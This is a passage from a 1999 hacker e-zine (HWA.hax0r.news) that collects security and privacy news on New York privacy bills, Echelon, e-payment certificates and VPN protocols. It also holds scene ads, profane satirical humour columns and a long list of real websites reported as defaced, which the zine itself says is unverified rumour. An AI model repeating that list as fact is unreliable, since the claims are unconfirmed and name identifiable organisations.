enthused. "The New York legislation package is very, very exciting," said Paul Schwartz, a law professor at Brooklyn Law School. "I think that this is something that is going to shift power to people on the Internet, and increase the transparencies of [privacy] policies [online]." "It's not surprising that states are moving when Washington policy legislators are largely sitting on their hands," said Marc Rotenberg, executive director of the Electronic Privacy Information Center. Existing federal measures to protect consumer privacy are largely directed at children. The Federal Trade Commission is charged with protecting privacy, but it can only bring limited civil actions. Critics charge that the US Commerce Department has failed to put its teeth behind consumer privacy because the Internet industry has successfully lobbied the agency that the associated costs of such a move would threaten the nation's lead in global e-commerce. In a privacy hearing in Washington last week, Rotenberg said that Congress showed itself to be inactive on the issue. "Everyone sat back and said 'Oh, it looks like self-regulation is working [and we] don't need to do anything.... By and large, I think the states have not been very impressed. So now they're dealing with wide range of issues." New York has been a state leader in areas of consumer protection and privacy protection, Rotenberg said. But Rotenberg noted that the potential impact of the various bills on Internet activity is still unclear. "By and large, the bills really target activity off the Internet," Rotenberg said. "[They] treat the Internet as one of many privacy issues." Still, one of the measures in the package would add a prohibition of the sale, lease, or exchange of any consumer's email address and any other personal identifying information that might be obtained online without a consumer's consent. Jason Catlett, of the online privacy watchdog group Junkbusters, is especially pleased with that measure. But he and others caution that the statewide reach of the legislation is one caveat for anyone hoping for far-reaching impact. "Most privacy advocates and experts would prefer to see broad federal legislation for the protection of personal data," said Catlett. "But some of these piecemeal measures may prevent some very specific injuries that consumers are suffering daily." Still, he said that some of the bills have a "private right of action, which allows individual consumers to sue companies that invade their privacy." That principle has worked well in telemarketing legislation and deserves to be extended to personal data protection, he said. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 53.0 [ISN] Congress, NSA butt heads over Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Putrefied Cow Originally From: 7Pillars Partners Congress, NSA butt heads over Echelon BY DANIEL VERTON (dan_verton@fcw.com) Congress has squared off with the National Security Agency over a top-secret U.S. global electronic surveillance program, requesting top intelligence officials to report on the legal standards used to prevent privacy abuses against U.S. citizens. According to an amendment to the fiscal 2000 Intelligence Authorization Act proposed last month by Sen. Bob Barr (R-Ga.), the director of Central Intelligence, the director of NSA and the attorney general must submit a report within 60 days of the bill becoming law that outlines the legal standards being employed to safeguard the privacy of American citizens against Project Echelon. Echelon is NSA's Cold War-vintage global spying system, which consists of a worldwide network of clandestine listening posts capable of intercepting electronic communications such as e-mail, telephone conversations, faxes, satellite transmissions, microwave links and fiber-optic communications traffic. However, the European Union last year raised concerns that the system may be regularly violating the privacy of law-abiding citizens [FCW, Nov. 17, 1998]. However, NSA, the supersecret spy agency known best for its worldwide eavesdropping capabilities, for the first time in the history of the House Permanent Select Committee on Intelligence refused to hand over documents on the Echelon program, claiming attorney/client privilege. Congress is "concerned about the privacy rights of American citizens and whether or not there are constitutional safeguards being circumvented by the manner in which the intelligence agencies are intercepting and/or receiving international communications...from foreign nations that would otherwise be prohibited by...the limitations on the collection of domestic intelligence," Barr said. "This very straightforward amendment...will help guarantee the privacy rights of American citizens [and] will protect the oversight responsibilities of the Congress which are now under assault" by the intelligence community. Calling NSA's argument of attorney/client privilege "unpersuasive and dubious," committee chairman Rep. Peter J. Goss (R-Fla.) said the ability of the intelligence community to deny access to documents on intelligence programs could "seriously hobble the legislative oversight process" provided for by the Constitution and would "result in the envelopment of the executive branch in a cloak of secrecy." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 54.0 [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek milewski Visa, Wells Fargo Deliver E-Payment Alternatives New Options for handling credit card transactions over the Web are emerging as cheaper and simpler alternatives to the dormant SET standard. As merchants continue to call for SET alternatives, two financial services giants--credit card company Visa International and online banking leader Wells Fargo & Co.--are trying a new approach: issuing digital certificates for use in SSL-based sessions. Visa, which co-developed SET with MasterCard International, will now let banks issue RSA Data Security X.509 digital certificates to merchants and will provide those banks with data collection, authorization, routing and settlement services for Internet transactions through its new Visa Payment Gateway. The gateway, to go live this summer, gives merchants using the Visanet point-of-sale network access to that same network through Web channels. That means there's no legacy-systems integration required by Visa USA's 6,000 member banks, many of which have characterized the Secure Electronic Transactions (SET) protocol as a gamble because of the implementation costs. Visa's gateway arrives just one week after Wells Fargo said it will offer merchants e-commerce services that combine Secure Sockets Layer (SSL) encryption with digital certification. Wells Fargo has partnered with GTE's CyberTrust business unit to issue digital certificates to merchants. While both Visa and Wells Fargo still support SET, the moves underscore the difficulties that SET has faced. Few merchants and banks have installed SET-enabled systems because of their cost and complexity. In fact, less than 1 percent of U.S. merchants polled by Forrester Research said they are using or plan to use SET on their sites. Also, consumers have little incentive to use the e-wallet applications that SET requires, analysts said. Today, most Web storefronts protect credit card data using SSL encryption but do not validate users' identities with digital certificates. -- Jeffrey Schwartz http://www.internetwk.com/story/INW19990602S0002 -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: OSAll [www.aviary-mag.com] @HWA 55.0 [ISN] Protocols serve up VPN security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek milewski http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/tech/0531tech.html Protocols serve up VPN security By GREG MARCOTTE Network World, 05/31/99 As the need to securely open corporate LANs to telecommuters and disparate corporate sites grows, virtual private networks (VPN) continue to meet the demand. VPNs - which establish private, secure sessions between two or more LANs or between remote users and a LAN - use the Internet or private IP networks to distribute data and enable corporations to eliminate additional, often expensive, dedicated lines or remote access servers. Today, network executives must weigh two protocols that specify how VPNs should be built. The Point-to-Point Tunneling Protocol (PPTP) and IP Security (IPSec) protocol enable private sessions over the Internet and securely link remote users to corporate networks. The protocols also possess relative strengths and weaknesses in data security and ease of deployment. Network managers must determine which VPN protocol best suits the need of their organizations. Diagram of how PPTP works PPTP vs. IPSec security Spearheaded by Microsoft and US Robotics, PPTP was first intended for dial-up VPNs. The protocol was meant to augment remote access usage by letting users dial in to local ISPs and tunnel into their corporate networks. Unlike IPSec, PPTP was not intended to address LAN-to-LAN tunneling when it was first created. PPTP extends PPP - a protocol that defines point-to-point connections across an IP network. PPP is widely used to connect dial-up and broadband users to the public Internet or private corporate networks. Because PPP functions at Layer 2, a PPTP connection that encapsulates PPP packets allows users to send packets other than IP, such as IPX or NetBEUI. IPSec, on the other hand, functions at Layer 3 and is only able to provide the tunneled transport of IP packets. The encryption method commonly used in PPTP is defined at the PPP layer. Typically, the PPTP client is the Microsoft desktop, and the encryption protocol used is Microsoft Point-to-Point Encryption (MPPE). MPPE is based on the RSA RC4 standard and supports 40-bit or 128-bit encryption. Although this level of encryption is satisfactory for many applications, it is generally regarded as less secure than some of the encryption algorithms offered by IPSec, particularly 168-bit Triple-Data Encryption Standard (DES). Protect and serve Meanwhile, IPSec was built for secure tunneling over the Internet between protected LANs. It was meant for a connection with a remote office, another LAN or corporate supplier. For instance, a large automotive company could use an IPSec VPN to securely connect its suppliers and support purchases orders over the 'Net. IPSec also supports connections between remote users and corporate networks. Similarly, Microsoft added LAN-to-LAN tunneling support for PPTP in its Routing and Remote Access Server for Windows NT Server 4.0. When it comes to strong encryption and data integrity, IPSec is generally regarded as superior. The protocol combines key management with support for X.509 certificates, information integrity and content security. Furthermore, 168-bit Triple-DES encryption, the strongest form of encryption available in IPSec, is more secure than 128-bit RC4 encryption. IPSec also provides packet-by-packet encryption and authentication and prevents the "man-in-the-middle attack," in which data is intercepted by a third party, reconstructed and sent to the receiver. PPTP, however, is vulnerable to such assaults, primarily because it authenticates sessions but not individual packets. Note, however, that mounting a successful man-in-the-middle attack against a PPTP connection would take considerable effort and know-how. For many corporations, the ability to run PPTP from the Windows platform (it supports Windows NT, 95 and 98) can make deploying and maintaining a VPN seamless. For others, PPTP is perceived as less secure than IPSec. It is important to bear in mind, however, if deploying a VPN for remote users, IPSec requires an organization to load specialized client software on each desktop. Client software deployment and maintenance are a weighty undertaking that must be considered. In terms of simplicity, PPTP is substantially easier to deploy. @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............. Scarfed from PacketStorm via The Onion; I Am a Bad Ass By Herbert Kornfeld Accounts Receivable Supervisor YO, waaasssuuup, baby? H-Dog is back, and don't nobody fuck with this BADASS. You wanna fuck me, motherfucker? You gonna wish you didn't. 'Cause I the Accounts Receivable supervisor of Midstate Office Supply, and I AM a cold-blooded badass motherfucker, and if you fuck with me I'll go stone cold crazy on your ass. Like that motherfucker Steve Englebreiter of Associated Publishing House. Asshole thought he could postdate his goddamn check on a bill that was overdue for nearly a month and a half. I caught it right before we was ready to deposit it. Don't tell me it was no mistake; cocksucker knew what he was doing all along. Know what I did? Sent the goddamn thing right back along with a note saying we be passing his account along to a collection agency in two weeks if his bitch ass didn't pay up. Now, legally, we only supposed to notify our collection agency after 90 days, not a month and a half. But I didn't have to tell thefool that. Three days later cocksucker sends us a cashier's check via overnight mail for the full amount. Ain't nobody fucks with my badass self. Or take that ol' bitch Mildred Fladner who's always callin' up, bitchin' about her credit balance. "Those staplers only cost $36.50 for the half-dozen, not $38.50. Your cashier rung it up wrong." Then how come you didn't notice it then, y'ol ho? She high and everybody know it, but she make such a big deal about knowing the company president and everything she got everybody runnin' scared. Except this BAD ASS. So I go downstairs to the register she bought the staplers at, reset the date, duplicate the cashier number and purchase number, and ring the goddamn shit up at $39.50. Then I call her back sayin' I found the original detail tape and check it out, it looks like you owe us a dollar additional, plus extra sales tax, your own receipt must have come out poor. A week later I get a payment for the full amount, with her apologies. I pocket the extra buck and change, spend it on a lotto ticket, and win five bucks. It's payback time for that bitch. Now don't be messin' me up with the Accounts Payable Supervisor. The Accounts Payable Supervisor, he ain't no badass. Hell, he ain't even no man. His name is Myron or something, and he so old he can't even get it up no more. I gots a bitch in the cash room. Myron, everybody laugh at him. He supposed to be the one that got the money but everybody know I got it and it's no even my job. If I ever see you within even six feet of the coffee machine I'll Bruce Lee on your sorry ass. Mister Coffee, he my man. 'Cause only I know the perfect proportion: two and three eighths scoops of Folgers to three and one quarter cups of water. Ain't no use trying to do it yourself 'cause you'll just fuck it up; only I can do it right. 'Cause I got Kung Fu Grip. You got a problem with that? I got a problem with your existence, motherfucker. I was fucking your mother while you were still watching Fat Albert in yo' Underoos. I don't answer to nobody. One day I be blastin' the phat beats, and the company president come up to me and say, "Herbert, the Muzak is too loud, please turn down the receiver." I say, "I need my tunes when I be preparing account statements." Then he say, "I don't care, turn it down, it's distracting." So you know what I do? After he leaves for the day I steal a shitload of mints from his desk. He gets the message, and he don't give me no trouble no more. I be fucking his wife on the sly, anyhow. So don't fuck with this H-Dog Daddy Mack Mack Daddy Comin' Out Your Ass Badass, 'cause if you do I be comin' after you like pastrami on rye to whip your muthafukin' sorry ass. I mean it. Don't. Fuck. With. Me. ------------------/--------------- Keep Your Fucking Shit Off My Desk By Herbert Kornfeld Accounts Receivable Supervisor Yo, yo, yo, yo, yo, bruthahs 'n' sistahs. H-Dog here, His Stone Cold Baadness, The Original Gangsta, The Mack Daddy, The Freaky Gangbanga. And I got somethin' to say to all y'all bitches out there: Keep yo' motherfuckin' shit offa my desk, or I'll fuck your sorry ass up wit' a quickness. And I don't want to see y'all comin' around, puttin' your feet on it, neither. Or puttin' your goddamn coffee cups on it and leaving them fucked-up rings all upside the wood and shit. 'Cause I keep my fly shit on my desk. I gots my dope spreadsheets, my hangin' file folders, my delinquent-account file, my paper clips, my Post-It note dispenser, my monthly desk planner, my Midstate Office Supply business cards, my four-color ball-point pen, my motherfuckin' dot-matrix printer address labels, and my stoopid-fresh three-hole punch. Not to mention my computer. I swear, if I see any of y'all within three feet of my computer, I'll put a Lee Van Cleef on your bitch ass. I'll come at you like a mother fuck. I'm just trying to keep it real, know what I'm sayin'? I wanna stop the violence before it starts. I could say nothin' and wait in the shadows like some motherfuckin' ninja, and when some punk-ass temp worker come along and start readin' my "Attitude Is A Little Thing That Makes A Big Difference" Successories mouse pad, I could jump out and knock the sucka's teeth the fuck out. 'Cause that would be my right. A man's gotta protect what's his, right? Take what happened just last week. Judy Metzger, this li'l skank-ass ho from Accounts Payable, be runnin' her ass around the office, puttin' cupcakes wit' the goddamn smiley faces and shit on people's desks. I'm like, "Whus this smiley-face shit y'all be puttin' on my desk?" And she's like, "I made cupcakes for everyone in the office last night!" Now, I don't take shit from nobody, and I sure as hell don't take no shit from some bitch from Accounts Payable, so I picks up my letter opener and do some crazy kung-fu shit on her. "Flag yo' ass outta here, bitch, and keep yo' fuckin' cupcake shit offa my fly desk." She go runnin' out of the room and go gets her supervisor, Myron Schabe, from across the hall. Like I'm supposed to be scared of that. Myron older than shit and he wear bow ties like he Pee Wee Muthafuckin' Herman or somethin'. So then he come up to my cubicle and say, "Herbert, I think there's been a misunderstanding. It was Judy's turn this week to bring in a treat." I tell him I don't like no bitches from Accounts Payable puttin' no shit on my desk. But this Myron fool keep pushin' it, tellin' me: "It was meant as a nicety, Herbert, nothing else. It's Co-Worker Appreciation Month, and everybody's scheduled to bring in a treat. You yourself are signed up for next Wednesday." So you know what I tell him? I says, "I ain't gonna be bringing in no motherfuckin' treat, motherfucker. Treats is for old ladies in the nursing home and shit. And ain't nobody gonna be layin' they smiley-face bullshit on my dope fly desk. I gots everything where I want it, and ain't no little ho gonna be fuckin' it all up. So take yo' bitch-ass, bow-tie self and get the fuck out of my cubicle before I cut you, beee-yaatch!" After that, Myron walk out of there wit' his li'l dick between his legs. Ain't no Accounts Payable supervisor motherfucka gonna tell Herbert Kornfeld what to do. And no one else, for that matter. You put shit on my desk, you just signed your death warrant. I mean it. Heads will get flown. H-Dog out. And to all my homies in Accountz Reeceevable and the bruthahs kickin' it down in Shipping, keep ya heads up. Peace. ------------------/------------------ I Be The Real Employee Of The Month By Herbert Kornfeld Accounts Receivable Supervisor Yo yo yo yo, whassssuuup, G's. H-Dog in tha house, and you'll pardon me if I dispense with the usual formalities, but I'm out for muthafuckin' REVENGE. You see, some dirty cocksucka dared fuck with me, Tha Stone Cold Funky-Fresh Bad-Ass Of Accountz Reeceevable. I swear, before I sign out for lunch today I'm gonna Hong Kong on that sorry fool's ass. I'm gonna cut him a permanent smile wit' my Letter Opener Of Death. I'm serious. Heads will get flown. The shit came down yesterday morning, when Gerald Luckenbill, head comptroller at Midstate Office Supply, called a big-ass meeting to announce the Employee Of Tha Month. I figure, this meetin' gonna be real short, 'cause everybody knows who be the best employee at Midstate Office Supply--ME. Hell, I already got me so many Employee Of Tha Month plaques on my desk, I need a bigger muthafuckin' cubicle. So you know what that bitch-ass Luckenbill do? He give the muthafuckin' Employee Of Tha Month plaque to muthafuckin' Phil Weinstein from customer muthafuckin' service. Luckenbill say Weinstein got chosen because of "his outstanding service to the company and the gracious and courteous manner in which he always treats the customers." That's bullshit, man. Weinstein only got chose Employee Of Tha Month 'cause his supervisor, Sandra Schumacher, wanna ride his cock. I don't need no dust-crotch supervisor ho wantin' to freak my ass, 'cause I be my own muthafuckin' supervisor, and I don't answer to nobody. I be the real Employee Of Tha Month. Everybody think, ol' Herbert, he don't deserve no Employee Of Tha Month award. He ain't got no shit on nobody. But think again, suckas. Shit gets done when I'm around. Ain't nobody balance more spreadsheets in a pay period than me. I coordinate the second-shift check-processing schedule like a mother fuck. Bills be sent. I even do shit I don't need to do. Like when Rose Powell, that head payroll bitch from Human Resources, quit, I helped that department out, 'cause Human Resources manager Bob Cowan don't know shit about payroll and woulda fucked it all up. All this, and I'm goin' to night school. I be just three credits away from my two-year accounting degree, and Midstate be payin' my tuition, besides. If that all wasn't enough, the second-floor vendin' machine even stopped servin' up them nasty muthafuckin' nut rolls 'cause of me. You see, last Tuesday, the man from Karlsen Vending came by to restock the vending machine, and I said to him, "You better stop loadin' this thing with them skank-ass Pearson's Nut Rolls if you know what's good for you, cocksucka." And just like that, he stopped. Why? 'Cause he shit-scared of me. He knows I gots the Kung Fu grip. And I gots so much dead presidents in my pocket from workin' all that overtime last Christmas season, when this fiscal year is through I'm gonna take me a long vacation and chill out with some of my bitches in Branson, MO. I'm so good, I even got this one motherfuckin' delinquent account that's been in our files for months to pay the fuck up. That's right. See, one day, I was readin' the newspaper, and I saw this legal notice sayin' that the fucka who owed us all this cash was goin' bankrupt, and that any creditors who were owed money by him had best make theyselves known wit' a quickness. So I tell that Luckenbill about it, he calls our lawyer, and, before you know it, Midstate Office Supply gets this check for $4,130 in the mail. That bitch got wrote off. Uh huh. So when I says I superbad, I ain't just blowin' shit out my ass. H-Dog gots tha flava. Luckenbill said he gonna recommend I get a raise for my swift resolvin' of that delinquent account, but I told him, "Don't do me no damn favors, L, 'cause I gots me a score to settle." It's payback time for that Weinstein asshole. He ain't even been with the company a year, and he think he can hustle in on my award. Guess again, punk. I'm gonna jump in my fly hoopty and run this cocksucka down like a fuckin' dog. Weinstein's eyes gonna be buggin' when he sees my 1981 Buick Regal, a.k.a. Tha Nite Ridahh, comin' up on his sorry ass in the employee parking lot. Pow! I'm gonna take him out like I'm muthafuckin' Scarface, man. Daddy H over and OUT. But before I go, I wanna send some shout-outs to my homies around the office, and all the other righteous folks who be down with the H-Dog: my posse in Accountz Reeceevable, Gary, Linda, and Gladys; Ruth B. down in Inventory; tha Extra-Strength Disciples in Accounting; Janitor X; the whole gang over at Snap-Rite Corporation, makers of funky-dope spreadsheets and fly file folders; them cafeteria bitches Theresa and Donna; and Principles Of Accounting, Volume 4. Peace. @HWA SITE.1 www.interscape.403-security.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is a new website off the 403 server that is hosting the Interscape group and their efforts to bringing you a site with helpful software and original textfiles. Nice pleasing and easy to use layout, well worth a look see, drop by and check it out. @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Looks like things are quieter than normal perhaps with all the FBI action thats going down and groups getting raided some people are becoming a little antsy, well heres the list for this week according to HNN... From HNN rumours section, http://www.hackernews.com/ contributed by Anonymous Cracked Just a reminder that HNN has not been able to verify all of the sites listed below. This is why they are listed in the rumors section. Most of these sites (90%) where allegedly cracked by the Portugal group F0rpaxe in retaliation of recent FBI raids. The following sites have been reported to HNN as Cracked. http://hanyang.ac.kr http://lstc.edu http://www.kingjunk.com http://do-nt.8j.net http://www.canada.org.mx http://www.comicsexpress.com http://www.matrixmerchant.com http://www.phreaker.org http://www.saratoganational.com http://www.avaa.com http://www.cafe.tg http://www.sinadic.gov.ve http://www.ncspca.org http://www.nyshta.org http://www.schroonlake.org http://www.troop4.org http://www.wakpominee.org http://www.warrencounty.org http://www.washingtoncounty.org http://www.avaa.com http://www.lonepenguin.com http://www.michaelsgroup.com http://www.microbanker.com http://www.nomadmotel.com http://www.nordicks.com http://www.northcountryimports.com http://www.ornamint.com http://www.petdistributor.com http://www.pornamerica.com http://www.ramadainnalbany.com http://www.rawlinsmotel.com http://www.roaringbrookranch.com http://www.saratoganational.com http://www.schroonlakerealestate.com http://www.scooperdoggie.com http://www.seamscan.com http://www.shelteredlakes.com http://www.shopaviationmall.com http://www.sunroomliving.com http://www.surfsideonthelake.com http://www.thefoodservicesite.com http://www.theinnonthelibrarylawn.com http://www.timmayer.com http://www.tntsat.com http://www.treasurecoveresort.com http://www.valleypoolsandspas.com http://www.villagerlg.com http://www.wakitamotel.com http://www.wakondacampground.com http://www.jobdiscovery.org http://www.swets.nl http://www.sccm.edu http://www.afjca891.com http://www.albuquerquecars.com http://www.arrowfinancial.com http://www.astrowire.com http://www.augustacars.com http://www.bandbreservations.com http://www.bitcastle.com http://www.can-network.com http://www.dutchessmotel.com http://www.espey.com http://www.fallsfarm.com http://www.gfnational.com http://www.hanlonspub.com http://www.journeysendlodging.com http://www.kokeinc.com http://www.lakegeorgesteamboat.com http://www.lakehouseonlakegeorge.com http://www.leesmotel.com http://www.lincolnlogs.com http://www.mansionhill.com http://www.netblue.com http://www.networkofcommerce.com http://www.newworldsales.com http://www.steppingstonesresort.com http://www.stillbay.com http://www.xpandcorp.com http://www.pingnet.com http://www.omg.org http://www.merco.com.mx http://www.roland.net http://www.virtuallyyours.net http://www.cocacola.be http://www.galoucura.com.br http://www.jewel-world.com http://www.relative-web.com http://newsfeed.hollywood.com http://www.aviationnetwork.com http://coopra.inel.gov http://nbcsun2.ios.doi.gov June 2nd From HNN's rumours section; contributed by Anonymous Cracked The following web sites have been reported as Cracked. http://www.legal-med.com http://www.manateeisland.com http://penny.educ.monash.edu.au http://pestdata.ncsu.edu http://www.aftenposten.no http://www.bpfa.com http://www.rapides.k12.la.us http://policyworks.gov http://ogp1.policyworks.gov http://webcouncil.policyworks.go http://y2k.policyworks.gov http://www.bnl.gov June 3rd contributed by Anonymous Cracked The following sites have been reported to HNN as being cracked. http://www.jabby.com http://www.pinnacleleadership.com http://ce.hannam.ac.kr http://www.contourconstruction.com http://www.mrc.twsu.edu http://www.opamerica2.com http://www.utneza.edu.mx http://www.tomas98.org.mx June 4th contributed by Anonymous Cracked http://www.pocketstheclown.com http://www.polskaszkola.com http://www.cyber-n.net http://newfort.tesser.com http://www.intersky.com.mx http://www.sco-servicios.com.mx http://rsd.gsfc.nasa.gov http://www.getwiredweb.com http://www.cyts.com.cn http://www.moviedom.com.cn http://www.libo.com.cn http://www.xfl.com.cn http://www.zz.com.cn http://www.chinabusiness.com.cn http://www.ynst.net.cn http://www.cscu.edu.cn http://www.nwnu.edu.cn http://www.gi.com.mx http://www.decnet.com http://www.win-shareware.com ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.genocide2600.com/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]